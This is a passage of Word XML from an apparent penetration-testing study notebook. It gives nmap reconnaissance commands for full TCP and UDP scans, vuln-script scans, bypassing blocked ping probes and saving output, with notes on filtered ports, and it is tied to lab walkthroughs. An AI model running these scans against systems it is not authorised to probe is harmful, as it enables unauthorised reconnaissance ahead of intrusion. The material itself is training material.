    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- -sC -sV [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sU</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need root privilege so use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Pn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if you aren't getting any results back </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To bypass ping probes being blocked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oN [filename.txt] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to save it as a human readable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX [filename.xml] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to save it as xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oG [filename.grep]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save it as a grepable format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oA to save [filename]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save it as all formats:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.nmap (Normal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.xml (XML)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.gnmap (Grepable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it takes a really long time so if you want, you can just scan the top 100 ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n $IP -sU --top-ports=100 --reason</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId855">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play walkthrough, the author gave a whole list of nmap commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FULL TCP SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -p- -sT $IP -vvv --max-rate 100 --open -sCV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002900">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FULL UDP SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -p- -sU $IP -vvv --max-rate 100 --open -sCV -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002902">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP VULN SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002903">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap --script=vuln $IP -Pn -vvv -p- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002904">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002905">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's another one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002906">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo nmap -p- -sC -sV 192.168.190.79 --open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002907">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV-&gt;service version scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002908">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC -&gt; run some additional scripts to find more info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002909">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p- -&gt; scan all 65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--open -&gt;return only those ports which are open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo is used as we use a Stealth or SYN scan as it is faster than TCP or 3 way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">handshake</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that we can access raw sockets.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtered port meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A filtered state in nmap indicates that a port is being blocked by a firewall or some other network device (e.g., router, intrusion prevention system) that is actively filtering packets. This means nmap did not receive a response to its probe; instead, the packets were either dropped or filtered by an intermediary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002911">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002912">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtered ports may require bypass techniques, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002913">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002914">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
